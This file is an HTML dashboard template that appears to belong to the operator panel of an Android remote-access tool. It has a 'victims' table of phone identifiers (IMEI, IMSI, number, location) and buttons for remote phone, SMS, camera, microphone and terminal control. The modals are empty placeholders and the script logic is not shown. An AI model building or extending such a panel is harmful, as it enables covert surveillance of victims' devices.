<div class="container">
    <div class="page-title">
        <h3>Dashboard</h3>
    </div>
    <div class="box box-primary" style="height: 400px;overflow-y: auto;">
        <div class="box-body">
            <table width="100%" class="table table-hover" id="dataTables-example">
                <thead>
                    <tr>
                        <th>Model</th>
                        <th>Device-ID</th>
                        <th>IP Address</th>
                        <th>IMEI</th>
                        <th>API</th>
                        <th>Phone</th>
                        <th>IMSI</th>
                        <th>Location</th>
                        <th></th>
                    </tr>
                </thead>
                <tbody class="victims-body"> 
                    <tr>
                        <td>SM-179As</td>
                        <td>RF165433C</td>
                        <td>192.168.12.1</td>
                        <td>131123456789</td>
                        <td>23</td>
                        <td>+234812345678</td>
                        <td>62 61 12346789</td>
                        <td>Ikeja, Lagos</td>
                        <td class="text-end">
                            <button id="btn-connection-status" class="btn btn-outline-danger btn-rounded"><i class="fas fa-wifi"></i></button>
                            <button id="btn-phone" class="btn btn-outline-success btn-rounded"><i class="fas fa-phone"></i></button>
                            <button id="btn-sms" class="btn btn-outline-primary btn-rounded"><i class="fas fa-sms"></i></button>
                            <button id="btn-camera" class="btn btn-outline-secondary btn-rounded"><i class="fas fa-camera"></i></button>
                            <button id="btn-mic" class="btn btn-outline-info btn-rounded"><i class="fas fa-microphone"></i></button>
                            <button id="btn-terminal" class="btn btn-outline-dark btn-rounded"><i class="fas fa-terminal"></i></button>
                        </td>
                    </tr>           
                </tbody>
            </table>

          
        </div>
    </div>
</div>

<div style="overflow-x:auto;width:100%;white-space: normal;height: 150px;" class="container dark-box">
    <div class="box-body log-class" style="font-family: 'Courier Prime', monospace;">
        
    </div>
</div>


<!-- Phone -->
<div class="modal fade" id="phoneModal" tabindex="-1" role="dialog" aria-labelledby="phoneModal" aria-hidden="true">
    <div class="modal-dialog" role="document">
      <div class="modal-content">
        <div class="modal-header">
          <h5 class="phone-modal-title" id="phoneModalLabel">Phone</h5>
          <button type="button" id="phone-modal-dismiss" class="close" data-dismiss="modal" aria-label="Close">
            <span aria-hidden="true">&times;</span>
          </button>
        </div>
        <div class="modal-body">
          ...
        </div>
        <div class="modal-footer">
          <button type="button" class="btn btn-primary" id="modal-save">Save changes</button>
        </div>
      </div>
    </div>
</div>

<!-- SMS -->
<div class="modal fade" id="smsModal" tabindex="-1" role="dialog" aria-labelledby="smsModal" aria-hidden="true">
    <div class="modal-dialog" role="document">
      <div class="modal-content">
        <div class="modal-header">
          <h5 class="sms-modal-title" id="smsModalLabel">SMS</h5>
          <button type="button" id="sms-modal-dismiss" class="close" data-dismiss="modal" aria-label="Close">
            <span aria-hidden="true">&times;</span>
          </button>
        </div>
        <div class="modal-body">
          ...
        </div>
        <div class="modal-footer">
          <button type="button" class="btn btn-primary" id="modal-save">Save changes</button>
        </div>
      </div>
    </div>
</div>

<!-- Camera -->
<div class="modal fade" id="cameraModal" tabindex="-1" role="dialog" aria-labelledby="cameraModal" aria-hidden="true">
    <div class="modal-dialog" role="document">
      <div class="modal-content">
        <div class="modal-header">
          <h5 class="camera-modal-title" id="cameraModalLabel">Camera</h5>
          <button type="button" id="camera-modal-dismiss" class="close" data-dismiss="modal" aria-label="Close">
            <span aria-hidden="true">&times;</span>
          </button>
        </div>
        <div class="modal-body">
          ...
        </div>
        <div class="modal-footer">
          <button type="button" class="btn btn-primary" id="modal-save">Save changes</button>
        </div>
      </div>
    </div>
</div>

<!-- Mic -->
<div class="modal fade" id="micModal" tabindex="-1" role="dialog" aria-labelledby="micModal" aria-hidden="true">
    <div class="modal-dialog" role="document">
      <div class="modal-content">
        <div class="modal-header">
          <h5 class="mic-modal-title" id="micModalLabel">Microphone</h5>
          <button type="button" id="mic-modal-dismiss" class="close" data-dismiss="modal" aria-label="Close">
            <span aria-hidden="true">&times;</span>
          </button>
        </div>
        <div class="modal-body">
          ...
        </div>
        <div class="modal-footer">
          <button type="button" class="btn btn-primary" id="modal-save">Save changes</button>
        </div>
      </div>
    </div>
</div>

<!-- Terminal -->
<div class="modal fade" id="terminalModal" tabindex="-1" role="dialog" aria-labelledby="terminalModal" aria-hidden="true">
    <div class="modal-dialog" role="document">
      <div class="modal-content">
        <div class="modal-header">
          <h5 class="terminal-modal-title" id="terminalModalLabel">Terminal</h5>
          <button type="button" id="terminal-modal-dismiss" class="close" data-dismiss="modal" aria-label="Close">
            <span aria-hidden="true">&times;</span>
          </button>
        </div>
        <div class="modal-body">
          ...
        </div>
        <div class="modal-footer">
          <button type="button" class="btn btn-primary" id="modal-save">Save changes</button>
        </div>
      </div>
    </div>
</div>
<script src="{{ url_for('static', filename='assets/js/socketio.js') }}"></script>
<script src="{{ url_for('static', filename='assets/js/dashboard.js') }}"></script>